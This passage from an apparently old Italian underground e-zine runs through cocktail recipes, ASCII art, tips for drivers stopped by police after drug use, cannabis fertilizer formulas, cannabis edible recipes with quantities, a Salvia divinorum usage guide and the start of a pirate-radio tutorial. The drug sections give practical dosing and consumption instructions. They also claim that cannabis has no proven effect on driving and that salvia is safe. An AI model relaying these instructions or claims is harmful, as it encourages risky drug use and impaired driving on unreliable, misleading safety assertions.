queste bevande sono a base di uova. Vengono preparati nello shaker aggiungendo
latte, acquavite, cannella, noce moscata o paprica. La differenza fra gli
egg-nogs caldi e quelli freddi, sta nel fatto che in quelli caldi si deve
miscelare nello shaker prima di aggiungere il latte, mentre in quelli freddi
la miscelazione nello shaker va fatta assieme al latte, per non cuocere
l'uovo.
Hanno nomi di fantasia o dell'acquavite impiegata: French egg-nog;
Sherry egg-nog; Hot egg-nog, ecc.

Fizzes
I fizzes sono long drinks preparati nello shaker, a base di succo di limone,
bianco d'uovo, acquavite, zucchero e soda. Quando fate questo cocktail
bisogna che lo shaker sia agitato molto forte, il bicchiere sia pieno di soda
o di seltz e mescolato ripetutamente.
Assumono nomi di fantasia o dell'acquavite impiegata: Gin fizz, Whisky fizz,
ecc.

Flips
I flips sono short drinks freddi o caldi, a base di uova, zucchero, vino,
liquori, acquavite, noce moscata, succhi di frutta. I flips se caldo si dovra'
fare attenzione a travasare diverse volte la bevanda per far aumentare la
spuma. Prendono il nome dell'acquavite o del liquore ma sono anche di fantasia
Brandy flip, Whisky flip, Lemon flip, ecc.

Pousse-cafe'
Il pousse-cafe' e' uno short drink. Gli ingredienti principali del
puosse-cafe' sono le acquaviti e i liquori dolci, che devono essere versati
molto lentamente in un bicchiere inclinato in maniera che i due spiriti
rimangano separati l'uno dall'altro. Per avere questa divisione e' opportuno
versare gli spiriti tenendo conto del loro peso specifico: prima i piu'
pesanti (liquori dolci) e via via i piu' leggeri (acquaviti). Si puo' variare
come volete il colore degli spiriti impiegati, in modo che prima di gradire il
gusto si puo' deliziare l'occhio. Il pousse-cafe', assume nomi di fantasia o
dell'acquavite impiegata in maggior misura: Brandy scaffe',
American pousse-cafe', ecc.

Pousse-l'amour
Il pousse-l'amour e' un short drink ma che il tuorlo d'uovo e' d' obbligo. I
componenti devo essere separati anche in questo cocktail, compreso il tuorlo
d'uovo. Gli altri componenti sono gli stessi del pousse-cafe'. Prende nomi di
fantasia: Parfait amour, Thunder, ecc.

Toddies
I toddies sono bevande medio-lunghe. Possono essere servite sia fredde che
calde. Assumono il nome dello spirito impiegato con l'aggiunta di hot se e'
caldo, o cold se e' freddo: Brandy toddy, Whisky toddy cold,
Gin toddy hot, ecc.

Il piu' famoso cocktail secondo me e' il Martini che, secondo una ricetta
originale, comprendeva anche l'aggiunta di una goccia di maraschino. Secondo
voi quanti sono oggi i cocktails? Mille, forse duemila, forse di piu'. Alcuni
pero' per il loro sapore sono considerati classici: Alexander, Americano,
Bacardi, Bishop, Black Russian, Black Velvet, Bloody Mary, Bronx, Bucks Fizz,
Champagne Cocktail, Daiquiri, Dry Martini, Gibson, Gimlet, Gin Fizz,
Gin Sling, Gordon Cadillac, Grasshopper, Grog, Harvey, Lidia, Irish Coffee,
Jack Rose, John Collins, Manhattan, Margarita, Negroni, Old Fashioned,
Paradise, Pimms no. 1 Cup, Piña Colada, Pink Gin, Port Flip, Red Lion,
Rhum Collins, Rob Roy, Rose, Rusty Nail, Sangria, Scorpion, Screwdriver,
Side Car, Silver Fizz, Singapore Sling, Snowball, Snow Flake, Stinger,
Suissesse, Tequila Sunrise, White Lady, White Satin, Za-Za, Zombie, Zoom.....

Ecco alcune 'Formule' di cocktail :

Negroni
Cosa serve :
- 1 Fetta di limone
- 1/2 Vermut Rosso
- 1/2 Dry Gin
Mescolare bene
Servire con una fettina sottile di limone inserita sull'orlo del bicchiere.
Il Negroni e' uno dei cocktail piu' noti del mondo.

Martini Dry
Cosa serve :
- 1/4 Vermut Dry
- 3/4 Dry Gin
- 1 Fetta di limone
Nel mixing-glass con un po' di ghiaccio in polvere.
Mescolare con forza. Nel bicchiere ci vuole uno spruzzo di limone.

Crocker
- 4/5 Dry Gin
- 1/5 Vermut secco
Nello shaker con abbondante ghiaccio in polvere
Agitare bene.

Bronx
- 2/3 Dry Gin
- 1/6 Vermut Dry
- 1/6 Vermut Rosso
- 1/6 Succo d'arancia
Nello shaker con un po' di ghiaccio in polvere
Agitare bene e servirlo con una fettina di arancia.

Caruso
- 1/3 Dry Gin
- 1/3 Vermut Dry
- 1/3 Menta verde liquore
Nello shaker con ghiaccio in polvere
Agitare bene.

Irish Coffee
- 2 cucchiaini Zucchero
- 1 Caffè espresso molto caldo
- 1 bicchierino Irish Whiskey
- Crema Fresca
Nel bicchiere leggermente caldo mescolare bene.
Aggiungere un bicchierino di Irish Whiskey e quindi la crema fresca lentamente
perche' rimanga intatta in superficie.

Penso di aver finito, non pensate male di me )non( bevo molto.
Spero di esservi stato utile.

Ciao a tutti.

---SiX---

######################################################
#+-----------++-----------++-----------++-----------+#
#| AsCiI-ArT || AsCiI-ArT || AsCiI-ArT || AsCiI-ArT |#
#+-----------++-----------++-----------++-----------+#
######################################################

-=!!!|-ASCII made in aIs-|!!!=-

Autori: cYb0rG-jAcKal-

MaDe iN jAcKal...

______ __
/\ _ \ /\ \ __
\ \ \L\ \ ___ __ _ __ ___\ \ \___ __ __ /\_\ ___
\ \ __ \ /' _ `\ /'__`\ /\`'__\/'___\ \ _ `\/\ \/\ \ \/\ \ /' _ `\
\ \ \/\ \/\ \/\ \/\ \L\.\_\ \ \//\ \__/\ \ \ \ \ \ \_\ \ \ \ \/\ \/\ \
\ \_\ \_\ \_\ \_\ \__/.\_\\ \_\\ \____\\ \_\ \_\/`____ \ \ \_\ \_\ \_\
\/_/\/_/\/_/\/_/\/__/\/_/ \/_/ \/____/ \/_/\/_/`/___/> \ \/_/\/_/\/_/
/\___/
\/__/
__ __ __
/\ \__/\ \ /\ \__
\ \ ,_\ \ \___ __ ____ __ __ ____\ \ ,_\ __ ___ ___
\ \ \/\ \ _ `\ /'__`\ /',__\/\ \/\ \ /',__\\ \ \/ /'__`\/' __` __`\
\ \ \_\ \ \ \ \/\ __/ /\__, `\ \ \_\ \/\__, `\\ \ \_/\ __//\ \/\ \/\ \
\ \__\\ \_\ \_\ \____\ \/\____/\/`____ \/\____/ \ \__\ \____\ \_\ \_\ \_\
\/__/ \/_/\/_/\/____/ \/___/ `/___/> \/___/ \/__/\/____/\/_/\/_/\/_/
/\___/
\/__/

MaDe iN cYb0rG...

_____ .__ _________ _ _ ________
/ _ \ |__| / _____/__| || |__\_____ \
/ /_\ \ | | \_____ \ \ __ / / ____/
/ | \| | / \ | || | / \
\____|__ /|__|/_______ //_ ~~ _\\_______ \
\/ \/ |_||_| \/


####################################################
####### N N AAA RRRR CCCC OOO SSSS #######
####### NN N A A R R C O O S #######
####### N N N AAAAA RRRR C O O SSSS #######
####### N NN A A R R C O O S S #######
####### N N A A R RR CCCC OOO SSSS #######
####################################################

-=!!!|-c0nSiGli pEr iL bu0n FumAt0Re-|!!!=-
Ovvero: Guida sotto effetto di sostanze stupefacenti: Cosa bisogna fare se
vieni fermato dagli SBIRRI...

Autore: 0lDir0n61

-Consegnare la patente solo se ci si trova alla guida di un veicolo che la
richiede. Se si e' su un motorino, basta consegnare la Carta d'Identita'.
Cio' non toglie che, qualora si dovesse risultare positivo all'esame delle
urine, il Prefetto possa disporre comunque la sospensione della patente
stessa.

-Se gli sbirri ti vorranno accompagnare all'ospedale per sottoporti alle
analisi, non andare MAI con la tua macchina perche' c'e' il rischio che, se
risultassi positivo, chiamano l'ACI per farla rimuovere (œ 150.000) visto che
tu, per legge, non potresti piu' guidarla.

-Ricorda che l'esame delle urine e' obbligatorio solo per chi guida, e non per
gli eventuali passeggeri del veicolo, che comunque possono essere segnalati al
perfetto che potra' disporre, in caso di possesso da parte del passeggero, la
revisione della patente...

-Quando sei in ospedale sarai costretto a sottoporti all'esame delle urine.
Tale esame non ha valore giuridico, ma accerta solo che tu hai fatto uso di
sostanze stupefacenti, senza pero' stabilire quando.
E' tuo diritto, per accertare il tuo stato di non alterazione psicofisica e/o
sensoriale, richiedere i seguenti esami:

1)Esame neurologico (Per stimare i tempi di reazione)
2)Esame audiometrico e del campo visivo
(Per accertare che non vi siano eventuali alterazioni)
3)Visita psichiatrica (Per accertare che non si e' alterati)

-!!!-ATENZIONE-!!!-

Ricorda che gli esami da te richiesti possono costituire prove a TUO favore
quando deciderai di fare ricorso...

-Non esistono studi specifici che dimostrino una reale diminuizione
dell'attitudine alla guida da parte di soggetti sotto l'effetto di cannabis e
derivati. La metodologia dell'esame non e' in grado di accertare l'effettivo
contingente stato di alterazione psicofica-sensoriale del soggetto.
L'esame stabilisce esclusivamente se si e' fatto l'uso di cannabis e derivati
nell'arco di 20/30 giorni.
La presenza dei metaboli del THC9 e' rivelabile da circa 4 ore dopo
l'assunzione, fino a 30 giorni circa di distanza.
Il considerevole costo di questi esami, per la revisione della patente,
---->(Lit. 1.500.000 circa)<----
e' addebitato agli stessi "indagati" anche nel caso abbiano esito NEGATIVO.

In conclusione? Prendete gli autobus, i tram o la metro, e starete sicuramente
molto piu' tranquilli!!! ;-)

---0lDir0n61---


-=!!!|-C0NciMazI0nE dEllE pIanTe-|!!!=-

Autore: 0lDir0n61

Dopo aver spiegato (nei 2 numeri precedenti dell'e-zine) come coltivare le
nostre amate piantine, e' tempo di pensare alla concimazione, per la maggior
parte delle volte, chimica.

*Quali concimi chimici??*

Voi penserete:<ma ti vuoi avvelenare i polmoni con quelle skifezze kimiche??>
in realta' questa concimazione e' "chimica" perche' si basa su un equilibrio
di sali minerali, sciolti in acqua.....
Sono del tutto ATOSSIKE e possono solo far del bene alle nostre piantine! =)

--->ATTENZIONE<---
Un uso regolare di queste soluzioni dara' migliori risultati di un uso
discontinuo.
--->/ATTENZIONE<---

Qui di seguito le 4 formule di sali
(Parti espresse in grammi per 21 Litri di Acqua)

21 Litri di queste soluzioni bastano per l'intera crescita di 1 pianta
(Un Litro a Settimana)

+-------------------------------------------+
+-->Formula1:.:a base di Azoto (N)<---------+
+---------------------+---------------------+
| KNO3 | 3 |
| NH4NO3 | 51 |
| Ca(NO3)2 | 12 |
| KH2PO4 | 3 |
| MgSO4 | 6 |
+---------------------+---------------------+
+-->Formula2:.:a base di Calcio (Ca)<-------+
+---------------------+---------------------+
| Ca(NO3)2 | 45 |
| KH2PO4 | 3 |
| CaCl2 | 33 |
| MgSO4 | 3 |
| KNO3 | 3 |
+---------------------+---------------------+
+-->Formula3:.:a base di magnesio (Mg)<-----+
+---------------------+---------------------+
| KNO3 | 3 |
| KH2PO4 | 3 |
| Ca(NO3)2 | 12 |
| MgCl2 | 9 |
| MgSO4 | 12 |
+---------------------+---------------------+
+-->Formula4:.:a base di potassio (K)<------+
+---------------------+---------------------+
| KNO3 | 6 |
| KH2PO4 | 6 |
| KCl | 7.5 |
| MgSO4 | 3 |
| Ca(NO3)2 | 12 |
| K2SO4 | 13.5 |
+---------------------+---------------------+-----+
| KNO3 | nitrato di potassio |
| NH4NO3 | nitrato di ammonio |
| Ca(NO3)2 | dinitrato di calcio |
| KH2PO4 | fosfato acido di potassio |
| MgSO4 | solfato di magnesio |
| CaCl2 | cloruro di calcio |
| MgCl2 | cloruro di magnesio |
| KCl | cloruro di potassio |
| K2S04 | solfato di potassio |
+---------------------+---------------------------+

-E dove li trovo tutti 'sti elementi?-
Semplice! In un vivaio, o in un negozio di botanica,
oppure in una farmacia Agraria.

===================] Formula 1 (a base di azoto) [============================

Statura & sviluppo della pianta:

Le piantine saranno corte, tozze e ricoperte da molte foglie.
L'introduzione di azoto non dovrebbe essere interrotta fino alla sesta
settimana ed oltre.

Condizione del fogliame e della resina:

Il fogliame, come detto prima, e' abbondante, di colore verde-scuro e le
foglie sono spesse; un eccesso nel dosaggio dell'azoto provoca una perdita di
acqua e puo' causare l'avizzimento. Una deficienza di azoto nella maturita',
al contrario,stimola la produzione di resina; il rapporto dei sessi e' di 9:1
le piante di sesso femminile.
Un eccesso di azoto creera' una crescita precoce delle piante nello stadio di
piccoli arbusti; appariranno robuste, ma moriranno al momento della
differenziazione dei sessi.

===================] Formula 2 (a base di calcio) [===========================

Statura & sviluppo della pianta:

Un gambo molto forte e fibroso e' desiderabile dove i venti forti sono comuni
(Se la vostra coltivazione e' indoor cio' non si verifica) Le piante non
raggiungono un'altezza notevole. Il colore e' verde scuro ed i fiori sono
rigonfi.

Condizione del fogliame e della resina:

Le piante robuste generano foglie un po' pi— piccole che con gli altri
supplementi. Il fogliame non e' molto spesso ed abboddante. Un'alta
concentrazione di sale di calcio ostacola la produzione di resina. Il rapporto
dei sessi e' di 7:3 per le piante maschili.Una dose eccessiva di calcio nella
giovane eta' impedira' la crescita, ma un adeguato rifornimento e' essenziale
nelle prime 6/9 settimane


====================] Formula 3 (a base di magnesio) [========================

Statura & sviluppo della pianta:

Le concentrazioni di magnesio danno una statura buona. Il gambo sara' fibroso
e cavo, un po' legnoso, non altrettanto forte come con la formula a base di
calcio. Le foglie saranno robuste, ma di un colore verde pallido, quindi
assumeranno un colore brunato e avvizziranno ai bordi e sulle punte.

Condizione del fogliame e della resina:

Il fogliame e' piu' rado che con un alto dosaggio di potassio. Le foglie
vecchie avvizziscono rapidamente. Una mancanza di magnesio tratterra' e
ostacolera' la produzione di resina. Il rapporto dei sessi e' di 6:4 per le
piante maschili. Il magnesio e' vitale per la salute globale, ma e'
consigliabile somministrarlo cautamente.

====================] Formula 4 (a base di potassio) [========================

Statura & sviluppo della pianta:

Il potassio favorisce un'enorme crescita delle piante. Il gambo e' largo, molto
spesso di fibra, legnoso e fragile. Le foglie sono spesse, robuste, di colore
verde scuro. Il ciclo di crescita e' accorciato di una settimana.

Condizione del fogliame e della resina:

Produzione stimolata di foglie molto larghe. Se dopo la 10ima settimana si
somministra una dose eccessiva di potassio, la produzione di resina sara'
danneggiata. Il rapporto dei sessi e' di 7:3 per le piante femminili.
Il potassio e' essenziale nei primi stadi di vita, ma ha sostanziali effetti
negativi se una concentrazione troppo alta permane nella maturita'.

Per questa volta e' tutto, nel prossimo numero parleremo dei fiori, sia
maschili che femminili, e di uno strano incrocio...

---0ldir0n61---

##############################################
#+---------++---------++---------++---------+#
#| kiTcHen || kiTcHen || kItCheN || kItCheN |#
#+---------++---------++---------++---------+#
##############################################

-=!!!|-lE rIcEtTe dEl vEcChi0-|!!!=-

Autore: 0lDir0n61

In questo articolo vi scrivero' qualche ricetta, il cui ingrediente
principale, e' la canapa......

Prima di iniziare vorrei dire che per cucinare e' meglio usare canapa di sesso
Maschile...quindi, in caso di un raccolto infelice, la canapa "Maschio" visto
che e' pressappoco come fumarsi una sigaretta (Ha un bassissimo tasso di THC9)
potra' essere usata esclusivamente per mangiare...

Ma ora veniamo alle ricette:

Il menu sara' il seguente: verra' descritto a partire da ais2, per continuare
nelle prossime pubblicazioni (a voi la scelta delle portate ;-))

In questo numero ci occuperemo dei dolci e di una bevanda...

+------------------------+---------------+
+->Nome<-----------------+>Da Servire<---+
+------------------------+---------------+
| ./ d0lCi \. |
+------------------------+---------------+
+- Yogurt Number One -+--<freddo>-----|
+- Space cake -+---<caldo >----|
+- Bhang -+--<freddo>-----|
+- Mele Glassate -+---<caldo >----|
+------------------------+---------------+
| ./ BevAnDe \. |
+------------------------+---------------+
+- The'Indiano+Cannella -+---<caldo >----|
| | |
+------------------------+---------------+

-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_

*[ dOlcI ]*

|---->YogUrT nUmBeR oNe<----|

Ingredienti:

-4 Vasetti di yogurt
-10-15 gr. di hashish

Prendete il fumo, toglieteci i bordi (Senno' vi viene l'epatite) e
grattuggiatelo accuratamente.
Dividete i fumo per 4 e poi amalgamate bene i due elementi (Fumo e Yogurt)
*NOTA*
Piu' il fumo e' grattuggiato bene, migliore sara' la qualita' dell'alimento.
Ornate a piacimento...consigliate spezie come la cannella....
Per il gusto dello yogurt fate voi....consiglio cmq il muller bianco.

| |
---+->da servire FRESCO<-+---
| |


|---->bHanG<----|

Ingredienti:

-15 gr. Marijuana
-7 gr. semi di papavero
-7 gr. pepe
-3 gr. zenzero
Un pizzico di semi di cumino, un pizzico di semi di garofano, un pizzico di
cannella,
- 7 gr. semi di cocomero
- alcuni semi di cardamomo
- 7 Mandorle sbucciate
- 1 pizzico di noce moscata,
- 1a rosa ben grossa con tutto il calice (OPZIONALE)
- 250gr. zucchero
- <50cl. latte (aumentare per dimunire la consistenza...)

*Far bollire un terzo di litro d'acqua, toglierla dal fuoco e aggiungere la
marijuana; far riposare per circa 5 min, mescolare accuratamente, togliere la
marijuana e mettere l'acqua da parte.
Eliminare dall'erba i rametti ed i semi, metterla in un pestello e farne una
pastetta aggiungendovi lentamente del latte e tutti gli altri ingredienti
precedentemente lavorati e ben amalgamati, eccetto i semi di cocomero, di
papavero e lo zucchero.
Mettere da parte la pasta cosi' ottenuta.
Mischiare le due pastette con il latte rimasto, amalgamare ben bene, filtrare.
Tutto quello che non passa dal filtro va eliminato.
Mescolare bene con lo zucchero e filtrare nuovamente,
Infine si aggiunge latte fino ad ottenere la consistenza voluta, e l'acqua
precedentemente aromatizzata con la marijuana.

| |
---+->da servire ben FREDDO<-+---
| |


|---->Mele Glassate<----|

Ingredienti:

-4 Mele sbucciate, senza torsolo ed intere
-4 giliege
Mezza tazza di zucchero bruno. un terzo di tazza di marijuana,
mezzo bicchiere d'acqua
-2 cucchiaini di cannella in polvere

*ridurre in polvere la marijuana, mescolarla con lo zucchero, l'acqua e la
cannella.
Riempire le mele con questa pasta, ornare con le ciliege e mettere in forno,
gia' caldo, per circa 30 minuti.

| |
---+->da sevire ben CALDO<-+---
| |

-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_

*[ bEvAnDe ]*

|----->The' Indiano<----|

*Portate in ebollizione circa mezzo litro d'acqua, poi versare circa 4 gr. di
marijuana, finemente tritata, lasciando bollire per circa 5 minuti (se vi
piace forte potete tenerla per quanto tempo volete!).
Spegnere il fuoco, coprire, attendere almeno una decina di minuti, filtrare ed
addolcire con un po' di miele (evitate di usare lo zucchero)
Si possono usare fiori di gelsomino, un pizzico di cannella (Scelta
consigliata), oppure qualunque altra spezia che ci stia bene...

| |
---+->da servire ben CALDO<-+---
| |

-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_

->!!-ATTENZIONE-!!<-

Per raggiungere il massimo effetto, si consiglia di consumare questi alimenti
quando si Š COMPLETAMENTE sobri....se vi fate un kannone prima di mangiare,
i risultati saranno di molto affievoliti...

---0lDir0N61---

#################
#+-------------+#
#|-[ trying!]- |#
#+-------------+#
#################


-=|!!!-a Ma',NeKke'`t'aRitr0vi 'np0' de sArvIa?-!!!|=-

Autore: dr^Sp3nKy

Traduzione dal r0man0 in (kuasi)italiano:

"A ma' non e' ke hai un po' di Salvia?"

Il titolo originale era

"a ma',nekke'`t'aritrovi 'npo' de sarvia?";
visto ke,fortunatamente, la `zine di ais viene letta anke in altre citta'
italiane, ho dovuto moderare la mia cadenza romanaccia[skusa Roma...8(]

Mi e' stato vietato di pubblikare l'artikolo su kome fare Lsd[o kualkosa di
simile]in kasa e, kosi' ho cerkato una via alternativa,forse +
soddisfacente....

Non mi ritengo in nessun modo responsabile delle kazzate ke farete kon la
salvia e kompagnia bella.

Devo fare 2 premesse:
1)Per ki sia interessato ad avere info[Z] su kualsiasi tipo di droga e anke
kome farle a kasa,cerki su kualsiasi motore di ricerca
[konsiglio www.altavista.com]
la parola lycaeum,troverete un tot di siti tipo

http://salvia.lycaeum.org/

2)Tutto kuello ke vedete e' stato preso da un guida ke kiedeva esplicitamente
di copiare parola per parola l'artikolo sulla salvia... [ke io,se non avete
ankora capito,non faro' hihi...lAiDo rUlEz].

Ok,si komincia...cioe'...kontinuo domani perke' ho sonno...

r0nF r0nF r0nF - RaPid EyEs` m0vImEnTs - r0nF r0nF r0nF,sKu0la dEl kaZzo,

...si riekkomi kui...posso kontinuare [sto mangiando una bella rosetta kol
prosciutto,ke mi ha mandato la mia nonnina amata....e ke fra l'altro saluto...
anke se non sa ke e' un monitor....]...uff!ora si komincia sul serio..o almeno
ci provo...

Dedikato in partikolare a: la mia raga lella, elsa e mich&Yoghi.
ed anke a: gabriele delle Brigate Rozze, Gozzilla e le tre
bambine koi baffi, punkskin e tutto #phreak.it
#aisprod e #ahccc

- Regno e Storia.

La Salvia Divinorum [Salvia del Divinatore, o degli Indovini, dei Veggenti] e'
una tra le molte specie di Salvia,ke sono membri della famiglia della Menta.
Assunta in determinate kondizioni e modi...[ voi riuscite a parlare al cell
per 44 min kol la vostra raga e nel mentre digitate? ]...produce uno stato di
fattanza non paragonabile alla Marijuana, L(a)S(alvia)D(ivinorum);],Kale,Coka
o altra robba. Questa bellissima pianta e' stata usata per molti anni nelle
cerimonie religiose dagli indiani Mazatec, ke vivono nella provincia di Oaxaca
in Messico.

- Pro sull'uso della Salvia.

Fra l`altro potete farvi dei viaggetti mistici senza ke la pula o kualke
karabinero [kon la fiamma spenta sul kappello] vi caghi il kazzo, perke' la
Salvia kome l'alcool in Italia [per la Salvia penso anke in kualsiasi altra
parte del mondo] e' legale.

- Sostanza stupefacente.

La Salvia kontiene il Salvinorin-A [kome il THC nella Marijuana],ke e', a
kuanto ho kapito, la sostanza stupefacente. Questa sostanza pura dovrebbe
essere davvero micidiale,pensate ke un microgrammo [ cioe' un milionesimo di
grammo ] produce gia' effetti e un milligrammo [ cioe' un millesimo di grammo]
puo' causare gravi effetti per ki non usa Salvinorin-A puro.
Komunkue sia la Salvia, kome ho detto prima, non deve essere per esempio
paragonata agli effetti di un pastrano ke vi fumate , perke' e' simile e
dissimile ad altre sostanze ke vi alterano la mente.

- La sikurezza.

Avete mai sentito parlare di uno morto per overdose di "Foglia di Salvia?".
Lascio la risposta alle vostre menti.

- Kome il Salvinorin-A agisce sul cervello.

Nessuno conosce come il Salvinorin-A lavori nel cervello. Diciamo di sapere
che lavora differentemente da qualsiasi altra sostanza conosciuta. Sikuramente
vi fara' pensare.

- Kontro della Salvia (azz!).

Se pensate ke volete spakkarvi kon il Salvinorin-A in una festa tra amici,
oppure tra amici [intendo kuelli non proprio stretti], vi pigliera`
sikuramente a male.

- Tipi di viaggi.

I viaggi mistici di Salvia possono essere sia forti sia deboli, perke' dipende
da kome la prendete, kon ki la prendete, dove la prendete, dal vostro korpo e
da kuanta ne prendete.

- Pr[a]ekauzioni.

Non pigliate le prime volte ed anke kuelle sucessive la Salvia kuando state da
soli, ma fatevi assistere da uno ke non e' fuori a volare verso l`infinito ed
oltre kome voi.
Non guidate kuasiasi makkina anke dopo ke gli effetti sono finiti(sia motorini
auto, bici, apri skatole, seghe, motoseghe, barke, trapani, presse, ascensori
vabbe` sto a delira'...).
Inoltre non pigliate Salvia kuando state in mezzo a gente o a posti ke sapete
potrebbero farvela pigliare a male. Ci tengo a dirlo, perke' kuando piglia a
male e' veramente brutto, ma bruto bruto bruto ne'!

- Gli effetti.

Se la Salvia ve la fumate essikkata, gli effetti arriveranno in un minuto
circa.
Se ve la mastikate si sentono i primi effetti in circa 15 min e durano circa
30 min ma posso anke arrivare ad 1 ora o a 2 ore.

Gli effetti vengono divisi in 6 kategorie kiamate B-E-N-I-T-O[...hihi...] ke
vanno dal livello + basso di fattanza ad un livello + alto.

Kategoria B-E-N-I-T-O ,in onore della nostra grande luce durante il 19oo ;].

Skerzo kmq...anke perke' non penso ke il Duce si drogava...anzi...faceva sport
dalla mattina alla sera...

La categoria e' italianizzata per ragioni non ankora note all`autore 8).

Livello B : Effetti aBbastanza simili ad uno spino di Marijuana,kuindi risate.

Livello E : Processo di pensiero altErato[il mio e' sempre alterato...].

Livello N : FattaNza simile all'LSD, ke vi fa vedere forme kolorate kon okki
kiusi e suoni sentiti opaki o associati a kolori.

Livello I : Viaggio sciamanIko simile al sogno, visita ad altri luoghi ed
altri tempi.

Livello T : Perdita di identiTa`, fusione kon altre kose, siete kome un pugno
di bytez ke korre da un kapo all`altro del mondo ad una velocita'
altissima.Vi perdete nell`Universo.

Livello O : L`ultimo livello, kuello a kui non vorrei mai ritrovarmi.Perdita
dei sensi per alkuni minuti dovuti solo ad una dose troppo alta.
Sono stati riskontrati effetti di sonnambulismo.

-Kome assumere la Salvia.

- Metodi Maztechi tradizionali ( ke sarebbero 2 per ki non so kontare ).

I metodi Maztechi sono i + sikuri [sta' a signifikare ke gli indiani d`Amerika
non erano mika k¤¤¤ni...maledetti kolonizzatori di merda ke li hanno
sterminati,brutte teste di ¤¤¤¤ potevate restare a kasa, siete proprio dei
gran kug¤¤¤oni,Kolombo e' il kapo dei k¤¤¤ni e la sua madre una gran p¤¤¤ana;
kmq sia Kolombo non ha skoperto un bel k¤¤¤o perke' in Amerika ci erano
arrivati prima i Vikinghi, o un'altra popolazione Barbara ke ora non rikordo].


1) Un metodo e' fare un dekotto kon acqua e foglie freske di Salvia
[ kome se dovete fare un the' ].La fregatura di kuesto metodo e' ke
perderete le papille[..pupille hehe]gustative per il sapore amaro
...no vabbe',kmq sappiate ke e' amaro, molto molto amaro ne'.

2) Mastikare e ingoiare un grosso numero di foglie freske di Salvia
per circa mezz`ora.
Quest`ultimo lo skonsiglio di piu' del primo perke' c`e' perikolo
ke il vostro stomaco non abituato a sforzi, vi faccia kollassare
una sostanza verde.Il ke non e' bello,..poi vi blokka la crescita.

- Metodi non Maztechi,ossia "moderni"(ke sono 2 per ki non sa kontare).

Il metodo Quid:

Questo metodo koinsiste nel fare un gomitolo di foglie di Salvia,e
se non vi piace il gomitolo di foglie di Salvia fate il cilindro
(ke a me piace assai).
Dovete fare una mastikazione ogni dieci secondi per circa 30
minuti, tenendo la poltiglia ke si forma sotto la lingua e il
sukko,se ce la fate,in bokka.
Passati i 30 minuti sputate tutto e state attenti a non makkiarvi
perke' il sukko della Salvia non si levera' facilmente dalle moquette
o vestiti.
Il Quid lo potete fare sia kon foglie freske ke kon foglie sekke,ma
le sekke sono effettivamente meno amare.
Ki riesce a fare un cilindro kon foglie sekke di Salvia me lo fa
sapere..ok?

In koro: <<Si venerabile Padrone!>>.

Tutti kuelli ke invece non ci riusciranno, dovranno tenere le
foglie sekke nell'acqua per circa 10 minuti, poi le strizzate e ci
fate il cilindro o il gomitolo.
Per tutt'eddue(vabbe' si mi avete kapito...)le kose...cioe' foglie
freske e foglie sekke, avrete bisogno dalle 8 alle 16 foglie grandi.
Non fate pero' i ka¤¤o¤i ke partite subito da 16...aumentate
una foglia ogni volta ke il Quid non fara' + l`effetto kome la
precedente.

Il metodo tromba di Salvia.

Dovete farvi delle bombe di Salvia essikkata, kome fate kon la
Marijuana. Se la miccia vi si spegne riaccendetela; fate tiri veloci
e profondi anke perke' il Salvinorin-A fara' effetto solo se
vaporizzato (Il Salvinorin-A vaporizza ad alte temperature).
Konsiglio anke di farvi dei cilomi kon la Salvia essikkata.Kuando
fumate, i primi effetti sono sentiti entro un minuto.I pieni
effetti si raggiungono in circa 3 minuti. La durata totale del
viaggetto puo' variare da meno di 30 minuti sino ad un'ora.

- Konklusioni

Vabbe'...mo' me tokka studia' Latino....c'aveva proprio ragione
Axis....ke il latino fa' cagare e non serve a nulla. Mi rakkomando
non ci skerzate kon sta' pianta ke poi sono ka¤¤i vostri...Usate
kuindi kuesta pianta per capire kos'e' ke non capite, per avere
opinioni da uno dei molti voi per affrontare delle scelte o dei
problemi.

Ciao Ciao

---dR`sP3nKy---

###########################################
####### RRRR AAA DDD III OOO #######
####### R R A A D D III O O #######
####### RRRR AAAAA D D III O O #######
####### R R A A D D III O O #######
####### R RR A A DDD III OOO #######
###########################################

+----------------------------------------+
/| -[ 0ldir0n61's gReAt rAdi0 tUt0rIal ]- |
+/+----------------------------------------+
|//////////////////////////////////////////
+----------------------------------------+

./ -pARt 0nE- \.


-[ InTR0 ]-

Salve a tutti, da qui comincia il mio tutorial sulle radio... Troverete tutte
(o quasi) le informazioni circa le trasmissioni radio, con un palese
riferimento alle Radio Pirata, che possiedo nel mio "bagaglio tecnico" ;)
Il tutorial e' diviso in 2 parti...la prima eccola qua, la seconda parte
verra' pubblicata su AiS#3.

---
Vi ricordo che questo manuale e' stato scritto con l'unico scopo di dare al
lettore una preparazione teorico/tecnica riguardo i metodi radiantistici.

Si ricorda che trasmettere su suddette frequenze, senza autorizzazione
di trasmissione, e senza la dovuta patente radioamatoriale e'
FORTEMENTE ILLEGALE, pertanto e' perseguito dalla legge.
---

Dopo questo piccolo discalimer, scritto dalla parte "pulita" di 0ldir0n61,
cominciamo con il tutorial.


Ecco a voi l'indice degli argomenti...

-[ k0nTeNtS ]-

Gli asterischi dividono in 2 parti il tutorial...

1) La parte pubblicata in seguito

2) Parte restante, da pubblicare in AiS#3
1 2
+---+------------------------+-+-+
| 1 |INTRO |*| |
| 2 |KONTENTS |*| |
| 3 |BREAKING THE LAWS |*| |
| 4 |FREQUENZE E MODULAZIONI |*| |
| 5 |TX/RX IN ONDE ULTRACORTE|*| |
| 6 |TX/RX IN ONDE CORTE | |*|
| 7 |TX/RX IN ONDE MEDIE | |*|
| 8 |PRE-AMPLIFICATORI | |*|
| 9 |AMPLIFICATORI | |*|
|10 |ANTENNE |*| |
|11 |FILTRI DI RUMORE | |*|
|12 |ACCESSORI | |*|
|13 |LINKS |*| |
|14 |GLOSSARIO | |*|
|15 |OUTRO |*|*|
+---+------------------------+-+-+


-[ bReAKinG tHe LawS ]-

In questo articolo verranno elencate e spiegate alcune leggi inerenti alle
trasmissioni radio... tutto cio' per far rendere conto che l'attuazione delle
free-radios puo' essere molto rischioso...da qui chi sara' veramente convinto
continuera' nel proprio intento, chi prendeva le radio pirata come una cosa
"alternativa"e niente piu' lascera' perdere.

La legge piu' recente che abbiamo in italia risale al 1990, precisamente
